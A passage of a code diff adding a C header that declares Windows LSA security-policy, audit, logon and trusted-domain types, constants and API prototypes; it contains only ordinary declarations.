0x30 + ); + #ifdef INITGUID + #define Audit_DirectoryServiceAccess_defined + #endif +#endif + +/* 69979850-797a-11d9-bed3-505054503030 */ +#if !defined(INITGUID) || !defined(Audit_AccountLogon_defined) + DEFINE_GUID( + Audit_AccountLogon, + 0x69979850, + 0x797a, 0x11d9, 0xbe, 0xd3, 0x50, 0x50, 0x54, 0x50, 0x30, 0x30 + ); + #ifdef INITGUID + #define Audit_AccountLogon_defined + #endif +#endif + +#endif // DEFINE_GUID + +// 04.06.2011 - added +#if !defined(_NTLSA_IFS_) +#define _NTLSA_IFS_ + +#if !defined(_LSALOOKUP_) +#define _LSALOOKUP_ + +#if defined(_NTDEF_) + +typedef UNICODE_STRING LSA_UNICODE_STRING, *PLSA_UNICODE_STRING; +typedef STRING LSA_STRING, *PLSA_STRING; +typedef OBJECT_ATTRIBUTES LSA_OBJECT_ATTRIBUTES, *PLSA_OBJECT_ATTRIBUTES; + +#else // _NTDEF_ + +typedef struct _LSA_UNICODE_STRING { + USHORT Length; + USHORT MaximumLength; +#ifdef MIDL_PASS + [size_is(MaximumLength/2), length_is(Length/2)] +#endif // MIDL_PASS + PWSTR Buffer; +} LSA_UNICODE_STRING, *PLSA_UNICODE_STRING; + +typedef struct _LSA_STRING { + USHORT Length; + USHORT MaximumLength; + PCHAR Buffer; +} LSA_STRING, *PLSA_STRING; + +typedef struct _LSA_OBJECT_ATTRIBUTES { + ULONG Length; + HANDLE RootDirectory; + PLSA_UNICODE_STRING ObjectName; + ULONG Attributes; + PVOID SecurityDescriptor; // Points to type SECURITY_DESCRIPTOR + PVOID SecurityQualityOfService; // Points to type SECURITY_QUALITY_OF_SERVICE +} LSA_OBJECT_ATTRIBUTES, *PLSA_OBJECT_ATTRIBUTES; + +#endif // _NTDEF_ + +typedef struct _LSA_TRUST_INFORMATION { + LSA_UNICODE_STRING Name; // The name of the domain + PSID Sid; // ptr to domain Sid +} LSA_TRUST_INFORMATION, *PLSA_TRUST_INFORMATION; + +typedef struct _LSA_REFERENCED_DOMAIN_LIST { + ULONG Entries; // count of domains in domain array + PLSA_TRUST_INFORMATION Domains; // pointer to array LSA_TRUST_INFORMATION data +} LSA_REFERENCED_DOMAIN_LIST, *PLSA_REFERENCED_DOMAIN_LIST; + +#if (_WIN32_WINNT >= 0x0501) +typedef struct _LSA_TRANSLATED_SID2 { + SID_NAME_USE Use; + PSID Sid; + LONG DomainIndex; + ULONG Flags; +} LSA_TRANSLATED_SID2, *PLSA_TRANSLATED_SID2; +#endif + +typedef struct _LSA_TRANSLATED_NAME { + SID_NAME_USE Use; + LSA_UNICODE_STRING Name; + LONG DomainIndex; +} LSA_TRANSLATED_NAME, *PLSA_TRANSLATED_NAME; + +typedef struct _POLICY_ACCOUNT_DOMAIN_INFO { + LSA_UNICODE_STRING DomainName; + PSID DomainSid; +} POLICY_ACCOUNT_DOMAIN_INFO, *PPOLICY_ACCOUNT_DOMAIN_INFO; + +typedef struct _POLICY_DNS_DOMAIN_INFO +{ + LSA_UNICODE_STRING Name; + LSA_UNICODE_STRING DnsDomainName; + LSA_UNICODE_STRING DnsForestName; + GUID DomainGuid; + PSID Sid; +} POLICY_DNS_DOMAIN_INFO, *PPOLICY_DNS_DOMAIN_INFO; + +#define LOOKUP_VIEW_LOCAL_INFORMATION 0x00000001 +#define LOOKUP_TRANSLATE_NAMES 0x00000800 + +typedef enum _LSA_LOOKUP_DOMAIN_INFO_CLASS { + AccountDomainInformation = 5, + DnsDomainInformation = 12 +} LSA_LOOKUP_DOMAIN_INFO_CLASS, *PLSA_LOOKUP_DOMAIN_INFO_CLASS; + +typedef PVOID LSA_LOOKUP_HANDLE, *PLSA_LOOKUP_HANDLE; + +NTSTATUS +LsaLookupOpenLocalPolicy( + IN PLSA_OBJECT_ATTRIBUTES ObjectAttributes, + IN ACCESS_MASK AccessMask, + IN OUT PLSA_LOOKUP_HANDLE PolicyHandle + ); + +NTSTATUS +LsaLookupClose( + IN LSA_LOOKUP_HANDLE ObjectHandle + ); + +NTSTATUS +LsaLookupTranslateSids( + IN LSA_LOOKUP_HANDLE PolicyHandle, + IN ULONG Count, + IN PSID *Sids, + OUT PLSA_REFERENCED_DOMAIN_LIST *ReferencedDomains, + OUT PLSA_TRANSLATED_NAME *Names + ); + +#if (_WIN32_WINNT >= 0x0501) +NTSTATUS +LsaLookupTranslateNames( + IN LSA_LOOKUP_HANDLE PolicyHandle, + IN ULONG Flags, + IN ULONG Count, + IN PLSA_UNICODE_STRING Names, + OUT PLSA_REFERENCED_DOMAIN_LIST *ReferencedDomains, + OUT PLSA_TRANSLATED_SID2 *Sids + ); +#endif + +NTSTATUS +LsaLookupGetDomainInfo( + IN LSA_LOOKUP_HANDLE PolicyHandle, + IN LSA_LOOKUP_DOMAIN_INFO_CLASS DomainInfoClass, + OUT PVOID *DomainInfo + ); + +NTSTATUS +LsaLookupFreeMemory( + IN PVOID Buffer + ); + +#endif // _LSALOOKUP_ + +#define LSA_MODE_PASSWORD_PROTECTED (0x00000001L) +#define LSA_MODE_INDIVIDUAL_ACCOUNTS (0x00000002L) +#define LSA_MODE_MANDATORY_ACCESS (0x00000004L) +#define LSA_MODE_LOG_FULL (0x00000008L) + +typedef enum _SECURITY_LOGON_TYPE { + UndefinedLogonType = 0, // This is used to specify an undefied logon type + Interactive = 2, // Interactively logged on (locally or remotely) + Network, // Accessing system via network + Batch, // Started via a batch queue + Service, // Service started by service controller + Proxy, // Proxy logon + Unlock, // Unlock workstation + NetworkCleartext, // Network logon with cleartext credentials + NewCredentials, // Clone caller, new default credentials + //The types below only exist in Windows XP and greater +#if (_WIN32_WINNT >= 0x0501) + RemoteInteractive, // Remote, yet interactive. Terminal server + CachedInteractive, // Try cached credentials without hitting the net. + // The types below only exist in Windows Server 2003 and greater +#endif +#if (_WIN32_WINNT >= 0x0502) + CachedRemoteInteractive, // Same as RemoteInteractive, this is used internally for auditing purpose + CachedUnlock // Cached Unlock workstation +#endif +} SECURITY_LOGON_TYPE, *PSECURITY_LOGON_TYPE; + +typedef ULONG LSA_OPERATIONAL_MODE, *PLSA_OPERATIONAL_MODE; + +#if !defined(_NTLSA_AUDIT_) +#define _NTLSA_AUDIT_ + +// +// The following enumerated type is used between the reference monitor and +// LSA in the generation of audit messages. It is used to indicate the +// type of data being passed as a parameter from the reference monitor +// to LSA. LSA is responsible for transforming the specified data type +// into a set of unicode strings that are added to the event record in +// the audit log. +// + +typedef enum _SE_ADT_PARAMETER_TYPE { + + SeAdtParmTypeNone = 0, //Produces 1 parameter + SeAdtParmTypeString, //Produces 1 parameter. + SeAdtParmTypeFileSpec, + SeAdtParmTypeUlong, //Produces 1 parameter + SeAdtParmTypeSid, //Produces 1 parameter. + SeAdtParmTypeLogonId, //Produces 4 parameters. + SeAdtParmTypeNoLogonId, //Produces 3 parameters. + SeAdtParmTypeAccessMask, //Produces 1 parameter with formatting. + SeAdtParmTypePrivs, //Produces 1 parameter with formatting. + SeAdtParmTypeObjectTypes, //Produces 10 parameters with formatting. + SeAdtParmTypeHexUlong, //Produces 1 parameter + SeAdtParmTypePtr, //Produces 1 parameter + SeAdtParmTypeTime, //Produces 2 parameters + SeAdtParmTypeGuid, //Produces 1 parameter + SeAdtParmTypeLuid, // + SeAdtParmTypeHexInt64, //Produces 1 parameter + SeAdtParmTypeStringList, //Produces 1 parameter + SeAdtParmTypeSidList, //Produces 1 parameter + SeAdtParmTypeDuration, //Produces 1 parameters + SeAdtParmTypeUserAccountControl,//Produces 3 parameters + SeAdtParmTypeNoUac, //Produces 3 parameters + SeAdtParmTypeMessage, //Produces 1 Parameter + SeAdtParmTypeDateTime, //Produces 1 Parameter + SeAdtParmTypeSockAddr, // Produces 2 parameters + SeAdtParmTypeSD, // Produces 1 parameters + SeAdtParmTypeLogonHours, // Produces 1 parameters + SeAdtParmTypeLogonIdNoSid, //Produces 3 parameters. + SeAdtParmTypeUlongNoConv, // Produces 1 parameter. + SeAdtParmTypeSockAddrNoPort, // Produces 1 parameter + SeAdtParmTypeAccessReason + +} SE_ADT_PARAMETER_TYPE, *PSE_ADT_PARAMETER_TYPE; + +#if !defined(GUID_DEFINED) +#include +#endif /* GUID_DEFINED */ + +typedef struct _SE_ADT_OBJECT_TYPE { + GUID ObjectType; + USHORT Flags; +#define SE_ADT_OBJECT_ONLY 0x1 + USHORT Level; + ACCESS_MASK AccessMask; +} SE_ADT_OBJECT_TYPE, *PSE_ADT_OBJECT_TYPE; + +typedef struct _SE_ADT_PARAMETER_ARRAY_ENTRY { + + SE_ADT_PARAMETER_TYPE Type; + ULONG Length; + ULONG_PTR Data[2]; + PVOID Address; +} SE_ADT_PARAMETER_ARRAY_ENTRY, *PSE_ADT_PARAMETER_ARRAY_ENTRY; + + +typedef struct _SE_ADT_ACCESS_REASON{ + ACCESS_MASK AccessMask; + ULONG AccessReasons[32]; + ULONG ObjectTypeIndex; + ULONG AccessGranted; + PSECURITY_DESCRIPTOR SecurityDescriptor; +} SE_ADT_ACCESS_REASON, *PSE_ADT_ACCESS_REASON; + +#define SE_MAX_AUDIT_PARAMETERS 32 +#define SE_MAX_GENERIC_AUDIT_PARAMETERS 28 + +typedef struct _SE_ADT_PARAMETER_ARRAY { + + ULONG CategoryId; + ULONG AuditId; + ULONG ParameterCount; + ULONG Length; + USHORT FlatSubCategoryId; + USHORT Type; + ULONG Flags; + SE_ADT_PARAMETER_ARRAY_ENTRY Parameters[ SE_MAX_AUDIT_PARAMETERS ]; + +} SE_ADT_PARAMETER_ARRAY, *PSE_ADT_PARAMETER_ARRAY; + +#define SE_ADT_PARAMETERS_SELF_RELATIVE 0x00000001 +#define SE_ADT_PARAMETERS_SEND_TO_LSA 0x00000002 +#define SE_ADT_PARAMETER_EXTENSIBLE_AUDIT 0x00000004 +#define SE_ADT_PARAMETER_GENERIC_AUDIT 0x00000008 +#define SE_ADT_PARAMETER_WRITE_SYNCHRONOUS 0x00000010 + +#define LSAP_SE_ADT_PARAMETER_ARRAY_TRUE_SIZE(AuditParameters) \ + ( sizeof(SE_ADT_PARAMETER_ARRAY) - \ + sizeof(SE_ADT_PARAMETER_ARRAY_ENTRY) * \ + (SE_MAX_AUDIT_PARAMETERS - AuditParameters->ParameterCount) ) + +#endif // !defined(_NTLSA_AUDIT_) + +typedef enum _POLICY_AUDIT_EVENT_TYPE { + + AuditCategorySystem = 0, + AuditCategoryLogon, + AuditCategoryObjectAccess, + AuditCategoryPrivilegeUse, + AuditCategoryDetailedTracking, + AuditCategoryPolicyChange, + AuditCategoryAccountManagement, + AuditCategoryDirectoryServiceAccess, + AuditCategoryAccountLogon + +} POLICY_AUDIT_EVENT_TYPE, *PPOLICY_AUDIT_EVENT_TYPE; + +#define POLICY_AUDIT_EVENT_UNCHANGED (0x00000000L) +#define POLICY_AUDIT_EVENT_SUCCESS (0x00000001L) +#define POLICY_AUDIT_EVENT_FAILURE (0x00000002L) +#define POLICY_AUDIT_EVENT_NONE (0x00000004L) + +#define POLICY_AUDIT_EVENT_MASK \ + (POLICY_AUDIT_EVENT_SUCCESS | \ + POLICY_AUDIT_EVENT_FAILURE | \ + POLICY_AUDIT_EVENT_UNCHANGED | \ + POLICY_AUDIT_EVENT_NONE) + +#define LSA_SUCCESS(Error) ((LONG)(Error) >= 0) + +NTSTATUS +NTAPI +LsaRegisterLogonProcess ( + IN PLSA_STRING LogonProcessName, + OUT PHANDLE LsaHandle, + OUT PLSA_OPERATIONAL_MODE SecurityMode + ); + +NTSTATUS +NTAPI +LsaLogonUser ( + IN HANDLE LsaHandle, + IN PLSA_STRING OriginName, + IN SECURITY_LOGON_TYPE LogonType, + IN ULONG AuthenticationPackage, + IN PVOID AuthenticationInformation, + IN ULONG AuthenticationInformationLength, + IN OPTIONAL PTOKEN_GROUPS LocalGroups, + IN PTOKEN_SOURCE SourceContext, + OUT PVOID *ProfileBuffer, + OUT PULONG ProfileBufferLength, + OUT PLUID LogonId, + OUT PHANDLE Token, + OUT PQUOTA_LIMITS Quotas, + OUT PNTSTATUS SubStatus + ); + +NTSTATUS +NTAPI +LsaLookupAuthenticationPackage ( + IN HANDLE LsaHandle, + IN PLSA_STRING PackageName, + OUT PULONG AuthenticationPackage + ); + +NTSTATUS +NTAPI +LsaFreeReturnBuffer ( + IN PVOID Buffer + ); + +NTSTATUS +NTAPI +LsaCallAuthenticationPackage ( + IN HANDLE LsaHandle, + IN ULONG AuthenticationPackage, + IN PVOID ProtocolSubmitBuffer, + IN ULONG SubmitBufferLength, + OUT OPTIONAL PVOID *ProtocolReturnBuffer, + OUT OPTIONAL PULONG ReturnBufferLength, + OUT OPTIONAL PNTSTATUS ProtocolStatus + ); + +NTSTATUS +NTAPI +LsaDeregisterLogonProcess ( + IN HANDLE LsaHandle + ); + +NTSTATUS +NTAPI +LsaConnectUntrusted ( + OUT PHANDLE LsaHandle + ); + +//////////////////////////////////////////////////////////////////////////// +// // +// Local Security Policy Administration API datatypes and defines // +// // +//////////////////////////////////////////////////////////////////////////// + +#define POLICY_VIEW_LOCAL_INFORMATION 0x00000001L +#define POLICY_VIEW_AUDIT_INFORMATION 0x00000002L +#define POLICY_GET_PRIVATE_INFORMATION 0x00000004L +#define POLICY_TRUST_ADMIN 0x00000008L +#define POLICY_CREATE_ACCOUNT 0x00000010L +#define POLICY_CREATE_SECRET 0x00000020L +#define POLICY_CREATE_PRIVILEGE 0x00000040L +#define POLICY_SET_DEFAULT_QUOTA_LIMITS 0x00000080L +#define POLICY_SET_AUDIT_REQUIREMENTS 0x00000100L +#define POLICY_AUDIT_LOG_ADMIN 0x00000200L +#define POLICY_SERVER_ADMIN 0x00000400L +#define POLICY_LOOKUP_NAMES 0x00000800L +#define POLICY_NOTIFICATION 0x00001000L + +#define POLICY_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED |\ + POLICY_VIEW_LOCAL_INFORMATION |\ + POLICY_VIEW_AUDIT_INFORMATION |\ + POLICY_GET_PRIVATE_INFORMATION |\ + POLICY_TRUST_ADMIN |\ + POLICY_CREATE_ACCOUNT |\ + POLICY_CREATE_SECRET |\ + POLICY_CREATE_PRIVILEGE |\ + POLICY_SET_DEFAULT_QUOTA_LIMITS |\ + POLICY_SET_AUDIT_REQUIREMENTS |\ + POLICY_AUDIT_LOG_ADMIN |\ + POLICY_SERVER_ADMIN |\ + POLICY_LOOKUP_NAMES) + + +#define POLICY_READ (STANDARD_RIGHTS_READ |\ + POLICY_VIEW_AUDIT_INFORMATION |\ + POLICY_GET_PRIVATE_INFORMATION) + +#define POLICY_WRITE (STANDARD_RIGHTS_WRITE |\ + POLICY_TRUST_ADMIN |\ + POLICY_CREATE_ACCOUNT |\ + POLICY_CREATE_SECRET |\ + POLICY_CREATE_PRIVILEGE |\ + POLICY_SET_DEFAULT_QUOTA_LIMITS |\ + POLICY_SET_AUDIT_REQUIREMENTS |\ + POLICY_AUDIT_LOG_ADMIN |\ + POLICY_SERVER_ADMIN) + +#define POLICY_EXECUTE (STANDARD_RIGHTS_EXECUTE |\ + POLICY_VIEW_LOCAL_INFORMATION |\ + POLICY_LOOKUP_NAMES) + +typedef struct _LSA_TRANSLATED_SID { + + SID_NAME_USE Use; + ULONG RelativeId; + LONG DomainIndex; + +} LSA_TRANSLATED_SID, *PLSA_TRANSLATED_SID; + +typedef enum _POLICY_LSA_SERVER_ROLE { + + PolicyServerRoleBackup = 2, + PolicyServerRolePrimary + +} POLICY_LSA_SERVER_ROLE, *PPOLICY_LSA_SERVER_ROLE; + +#if (_WIN32_WINNT < 0x0502) + +typedef enum _POLICY_SERVER_ENABLE_STATE { + + PolicyServerEnabled = 2, + PolicyServerDisabled + +} POLICY_SERVER_ENABLE_STATE, *PPOLICY_SERVER_ENABLE_STATE; +#endif + +typedef ULONG POLICY_AUDIT_EVENT_OPTIONS, *PPOLICY_AUDIT_EVENT_OPTIONS; + +typedef enum _POLICY_INFORMATION_CLASS { + + PolicyAuditLogInformation = 1, + PolicyAuditEventsInformation, + PolicyPrimaryDomainInformation, + PolicyPdAccountInformation, + PolicyAccountDomainInformation, + PolicyLsaServerRoleInformation, + PolicyReplicaSourceInformation, + PolicyDefaultQuotaInformation, + PolicyModificationInformation, + PolicyAuditFullSetInformation, + PolicyAuditFullQueryInformation, + PolicyDnsDomainInformation, + PolicyDnsDomainInformationInt, + PolicyLocalAccountDomainInformation, + PolicyLastEntry + +} POLICY_INFORMATION_CLASS, *PPOLICY_INFORMATION_CLASS; + +typedef struct _POLICY_AUDIT_LOG_INFO { + + ULONG AuditLogPercentFull; + ULONG MaximumLogSize; + LARGE_INTEGER AuditRetentionPeriod; + BOOLEAN AuditLogFullShutdownInProgress; + LARGE_INTEGER TimeToShutdown; + ULONG NextAuditRecordId; + +} POLICY_AUDIT_LOG_INFO, *PPOLICY_AUDIT_LOG_INFO; + +typedef struct _POLICY_AUDIT_EVENTS_INFO { + + BOOLEAN AuditingMode; + PPOLICY_AUDIT_EVENT_OPTIONS EventAuditingOptions; + ULONG MaximumAuditEventCount; + +} POLICY_AUDIT_EVENTS_INFO, *PPOLICY_AUDIT_EVENTS_INFO; + +typedef struct _POLICY_AUDIT_SUBCATEGORIES_INFO { + + ULONG MaximumSubCategoryCount; + PPOLICY_AUDIT_EVENT_OPTIONS EventAuditingOptions; + +} POLICY_AUDIT_SUBCATEGORIES_INFO, *PPOLICY_AUDIT_SUBCATEGORIES_INFO; + +typedef struct _POLICY_AUDIT_CATEGORIES_INFO { + + ULONG MaximumCategoryCount; + PPOLICY_AUDIT_SUBCATEGORIES_INFO SubCategoriesInfo; + +} POLICY_AUDIT_CATEGORIES_INFO, *PPOLICY_AUDIT_CATEGORIES_INFO; + +// +// Valid bits for Per user policy mask. +// + +#define PER_USER_POLICY_UNCHANGED (0x00) +#define PER_USER_AUDIT_SUCCESS_INCLUDE (0x01) +#define PER_USER_AUDIT_SUCCESS_EXCLUDE (0x02) +#define PER_USER_AUDIT_FAILURE_INCLUDE (0x04) +#define PER_USER_AUDIT_FAILURE_EXCLUDE (0x08) +#define PER_USER_AUDIT_NONE (0x10) + + +#define VALID_PER_USER_AUDIT_POLICY_FLAG (PER_USER_AUDIT_SUCCESS_INCLUDE | \ + PER_USER_AUDIT_SUCCESS_EXCLUDE | \ + PER_USER_AUDIT_FAILURE_INCLUDE | \ + PER_USER_AUDIT_FAILURE_EXCLUDE | \ + PER_USER_AUDIT_NONE) + +typedef struct _POLICY_PRIMARY_DOMAIN_INFO { + + LSA_UNICODE_STRING Name; + PSID Sid; + +} POLICY_PRIMARY_DOMAIN_INFO, *PPOLICY_PRIMARY_DOMAIN_INFO; + +typedef struct _POLICY_PD_ACCOUNT_INFO { + + LSA_UNICODE_STRING Name; + +} POLICY_PD_ACCOUNT_INFO, *PPOLICY_PD_ACCOUNT_INFO; + +typedef struct _POLICY_LSA_SERVER_ROLE_INFO { + + POLICY_LSA_SERVER_ROLE LsaServerRole; + +} POLICY_LSA_SERVER_ROLE_INFO, *PPOLICY_LSA_SERVER_ROLE_INFO; + +typedef struct _POLICY_REPLICA_SOURCE_INFO { + + LSA_UNICODE_STRING ReplicaSource; + LSA_UNICODE_STRING ReplicaAccountName; + +} POLICY_REPLICA_SOURCE_INFO, *PPOLICY_REPLICA_SOURCE_INFO; + +typedef struct _POLICY_DEFAULT_QUOTA_INFO { + + QUOTA_LIMITS QuotaLimits; + +} POLICY_DEFAULT_QUOTA_INFO, *PPOLICY_DEFAULT_QUOTA_INFO; + + +typedef struct _POLICY_MODIFICATION_INFO { + + LARGE_INTEGER ModifiedId; + LARGE_INTEGER DatabaseCreationTime; + +} POLICY_MODIFICATION_INFO, *PPOLICY_MODIFICATION_INFO; + + +typedef struct _POLICY_AUDIT_FULL_SET_INFO { + + BOOLEAN ShutDownOnFull; + +} POLICY_AUDIT_FULL_SET_INFO, *PPOLICY_AUDIT_FULL_SET_INFO; + + +typedef struct _POLICY_AUDIT_FULL_QUERY_INFO { + + BOOLEAN ShutDownOnFull; + BOOLEAN LogIsFull; + +} POLICY_AUDIT_FULL_QUERY_INFO, *PPOLICY_AUDIT_FULL_QUERY_INFO; + + +typedef enum _POLICY_DOMAIN_INFORMATION_CLASS { + +#if (_WIN32_WINNT <= 0x0500) + PolicyDomainQualityOfServiceInformation = 1, +#endif + PolicyDomainEfsInformation = 2, + PolicyDomainKerberosTicketInformation + +} POLICY_DOMAIN_INFORMATION_CLASS, *PPOLICY_DOMAIN_INFORMATION_CLASS; + +#if (_WIN32_WINNT < 0x0502) + +#define POLICY_QOS_SCHANNEL_REQUIRED 0x00000001 +#define POLICY_QOS_OUTBOUND_INTEGRITY 0x00000002 +#define POLICY_QOS_OUTBOUND_CONFIDENTIALITY 0x00000004 +#define POLICY_QOS_INBOUND_INTEGRITY 0x00000008 +#define POLICY_QOS_INBOUND_CONFIDENTIALITY 0x00000010 +#define POLICY_QOS_ALLOW_LOCAL_ROOT_CERT_STORE 0x00000020 +#define POLICY_QOS_RAS_SERVER_ALLOWED 0x00000040 +#define POLICY_QOS_DHCP_SERVER_ALLOWED 0x00000080 + +// +// Bits 0x00000100 through 0xFFFFFFFF are reserved for future use. +// +#endif + +#if (_WIN32_WINNT == 0x0500) +typedef struct _POLICY_DOMAIN_QUALITY_OF_SERVICE_INFO { + + ULONG QualityOfService; + +} POLICY_DOMAIN_QUALITY_OF_SERVICE_INFO, *PPOLICY_DOMAIN_QUALITY_OF_SERVICE_INFO; + +#endif + +typedef struct _POLICY_DOMAIN_EFS_INFO { + + ULONG InfoLength; + PUCHAR EfsBlob; + +} POLICY_DOMAIN_EFS_INFO, *PPOLICY_DOMAIN_EFS_INFO; + +#define POLICY_KERBEROS_VALIDATE_CLIENT 0x00000080 + +typedef struct _POLICY_DOMAIN_KERBEROS_TICKET_INFO { + + ULONG AuthenticationOptions; + LARGE_INTEGER MaxServiceTicketAge; + LARGE_INTEGER MaxTicketAge; + LARGE_INTEGER MaxRenewAge; + LARGE_INTEGER MaxClockSkew; + LARGE_INTEGER Reserved; +} POLICY_DOMAIN_KERBEROS_TICKET_INFO, *PPOLICY_DOMAIN_KERBEROS_TICKET_INFO; + +typedef enum _POLICY_NOTIFICATION_INFORMATION_CLASS { + + PolicyNotifyAuditEventsInformation = 1, + PolicyNotifyAccountDomainInformation, + PolicyNotifyServerRoleInformation, + PolicyNotifyDnsDomainInformation, + PolicyNotifyDomainEfsInformation, + PolicyNotifyDomainKerberosTicketInformation, + PolicyNotifyMachineAccountPasswordInformation, + PolicyNotifyGlobalSaclInformation, + PolicyNotifyMax // must always be the last entry + +} POLICY_NOTIFICATION_INFORMATION_CLASS, *PPOLICY_NOTIFICATION_INFORMATION_CLASS; + +typedef PVOID LSA_HANDLE, *PLSA_HANDLE; + +typedef enum _TRUSTED_INFORMATION_CLASS { + + TrustedDomainNameInformation = 1, + TrustedControllersInformation, + TrustedPosixOffsetInformation, + TrustedPasswordInformation, + TrustedDomainInformationBasic, + TrustedDomainInformationEx, + TrustedDomainAuthInformation, + TrustedDomainFullInformation, + TrustedDomainAuthInformationInternal, + TrustedDomainFullInformationInternal, + TrustedDomainInformationEx2Internal, + TrustedDomainFullInformation2Internal, + TrustedDomainSupportedEncryptionTypes, +} TRUSTED_INFORMATION_CLASS, *PTRUSTED_INFORMATION_CLASS; + +typedef struct _TRUSTED_DOMAIN_NAME_INFO { + + LSA_UNICODE_STRING Name; + +} TRUSTED_DOMAIN_NAME_INFO, *PTRUSTED_DOMAIN_NAME_INFO; + +typedef struct _TRUSTED_CONTROLLERS_INFO { + + ULONG Entries; + PLSA_UNICODE_STRING Names; + +} TRUSTED_CONTROLLERS_INFO, *PTRUSTED_CONTROLLERS_INFO; + +typedef struct _TRUSTED_POSIX_OFFSET_INFO { + + ULONG Offset; + +} TRUSTED_POSIX_OFFSET_INFO, *PTRUSTED_POSIX_OFFSET_INFO; + +typedef struct _TRUSTED_PASSWORD_INFO { + LSA_UNICODE_STRING Password; + LSA_UNICODE_STRING OldPassword; +} TRUSTED_PASSWORD_INFO, *PTRUSTED_PASSWORD_INFO; + +typedef LSA_TRUST_INFORMATION TRUSTED_DOMAIN_INFORMATION_BASIC; +typedef PLSA_TRUST_INFORMATION PTRUSTED_DOMAIN_INFORMATION_BASIC; + +#define TRUST_DIRECTION_DISABLED 0x00000000 +#define TRUST_DIRECTION_INBOUND 0x00000001 +#define TRUST_DIRECTION_OUTBOUND 0x00000002 +#define TRUST_DIRECTION_BIDIRECTIONAL (TRUST_DIRECTION_INBOUND | TRUST_DIRECTION_OUTBOUND) + +#define TRUST_TYPE_DOWNLEVEL 0x00000001 // NT4 and before +#define TRUST_TYPE_UPLEVEL 0x00000002 // NT5 +#define TRUST_TYPE_MIT 0x00000003 // Trust with a MIT Kerberos realm + +#if (_WIN32_WINNT < 0x0502) +#define TRUST_TYPE_DCE 0x00000004 // Trust with a DCE realm +#endif + +// Levels 0x5 - 0x000FFFFF reserved for future use +// Provider specific trust levels are from 0x00100000 to 0xFFF00000 + +#define TRUST_ATTRIBUTE_NON_TRANSITIVE 0x00000001 // Disallow transitivity +#define TRUST_ATTRIBUTE_UPLEVEL_ONLY 0x00000002 // Trust link only valid for uplevel client +#if (_WIN32_WINNT == 0x0500) +#define TRUST_ATTRIBUTE_TREE_PARENT 0x00400000 // Denotes that we are setting the trust + // to our parent in the org tree... +#define TRUST_ATTRIBUTE_TREE_ROOT 0x00800000 // Denotes that we are setting the trust + // to another tree root in a forest... +// Trust attributes 0x00000004 through 0x004FFFFF reserved for future use +// Trust attributes 0x00F00000 through 0x00400000 are reserved for internal use +// Trust attributes 0x01000000 through 0xFF000000 are reserved for user +#define TRUST_ATTRIBUTES_VALID 0xFF02FFFF +#endif + +#if (_WIN32_WINNT < 0x0502) +#define TRUST_ATTRIBUTE_FILTER_SIDS 0x00000004 // Used to quarantine domains +#else +#define TRUST_ATTRIBUTE_QUARANTINED_DOMAIN 0x00000004 // Used to quarantine domains +#endif + +#if (_WIN32_WINNT >= 0x0501) +#define TRUST_ATTRIBUTE_FOREST_TRANSITIVE 0x00000008 // This link may contain forest trust information +#if (_WIN32_WINNT >= 0x0502) +#define TRUST_ATTRIBUTE_CROSS_ORGANIZATION 0x00000010 // This trust is to a domain/forest which is not part of this enterprise +#define TRUST_ATTRIBUTE_WITHIN_FOREST 0x00000020 // Trust is internal to this forest +#define TRUST_ATTRIBUTE_TREAT_AS_EXTERNAL 0x00000040 // Trust is to be treated as external for trust boundary purposes +#if (_WIN32_WINNT >= 0x0600) +#define TRUST_ATTRIBUTE_TRUST_USES_RC4_ENCRYPTION 0x00000080 // MIT trust with RC4 +#define TRUST_ATTRIBUTE_TRUST_USES_AES_KEYS 0x00000100 // Use AES keys to encrypte KRB TGTs +#endif +// Trust attributes 0x00000040 through 0x00200000 are reserved for future use +#else +// Trust attributes 0x00000010 through 0x00200000 are reserved for future use +#endif +// Trust attributes 0x00400000 through 0x00800000 were used previously (up to W2K) and should not be re-used +// Trust attributes 0x01000000 through 0x80000000 are reserved for user +#define TRUST_ATTRIBUTES_VALID 0xFF03FFFF +#endif +#define TRUST_ATTRIBUTES_USER 0xFF000000 + +typedef struct _TRUSTED_DOMAIN_INFORMATION_EX { + + LSA_UNICODE_STRING Name; + LSA_UNICODE_STRING FlatName; + PSID Sid; + ULONG TrustDirection; + ULONG TrustType; + ULONG TrustAttributes; + +} TRUSTED_DOMAIN_INFORMATION_EX, *PTRUSTED_DOMAIN_INFORMATION_EX; + +typedef struct _TRUSTED_DOMAIN_INFORMATION_EX2 { + + LSA_UNICODE_STRING Name; + LSA_UNICODE_STRING FlatName; + PSID Sid; + ULONG TrustDirection; + ULONG TrustType; + ULONG TrustAttributes; + ULONG ForestTrustLength; +#ifdef MIDL_PASS + [size_is( ForestTrustLength )] +#endif + PUCHAR ForestTrustInfo; + +} TRUSTED_DOMAIN_INFORMATION_EX2, *PTRUSTED_DOMAIN_INFORMATION_EX2; + +#define TRUST_AUTH_TYPE_NONE 0 // Ignore this entry +#define TRUST_AUTH_TYPE_NT4OWF 1 // NT4 OWF password +#define TRUST_AUTH_TYPE_CLEAR 2 // Cleartext password +#define TRUST_AUTH_TYPE_VERSION 3 // Cleartext password version number + +typedef struct _LSA_AUTH_INFORMATION { + + LARGE_INTEGER LastUpdateTime; + ULONG AuthType; + ULONG AuthInfoLength; + PUCHAR AuthInfo; +} LSA_AUTH_INFORMATION, *PLSA_AUTH_INFORMATION; + +typedef struct _TRUSTED_DOMAIN_AUTH_INFORMATION { + + ULONG IncomingAuthInfos; + PLSA_AUTH_INFORMATION IncomingAuthenticationInformation; + PLSA_AUTH_INFORMATION IncomingPreviousAuthenticationInformation; + ULONG OutgoingAuthInfos; + PLSA_AUTH_INFORMATION OutgoingAuthenticationInformation; + PLSA_AUTH_INFORMATION OutgoingPreviousAuthenticationInformation; + +} TRUSTED_DOMAIN_AUTH_INFORMATION, *PTRUSTED_DOMAIN_AUTH_INFORMATION; + +typedef struct _TRUSTED_DOMAIN_FULL_INFORMATION { + + TRUSTED_DOMAIN_INFORMATION_EX Information; + TRUSTED_POSIX_OFFSET_INFO PosixOffset; + TRUSTED_DOMAIN_AUTH_INFORMATION AuthInformation; + +} TRUSTED_DOMAIN_FULL_INFORMATION, *PTRUSTED_DOMAIN_FULL_INFORMATION; + +typedef struct _TRUSTED_DOMAIN_FULL_INFORMATION2 { + + TRUSTED_DOMAIN_INFORMATION_EX2 Information; + TRUSTED_POSIX_OFFSET_INFO PosixOffset; + TRUSTED_DOMAIN_AUTH_INFORMATION AuthInformation; + +} TRUSTED_DOMAIN_FULL_INFORMATION2, *PTRUSTED_DOMAIN_FULL_INFORMATION2; + +typedef struct 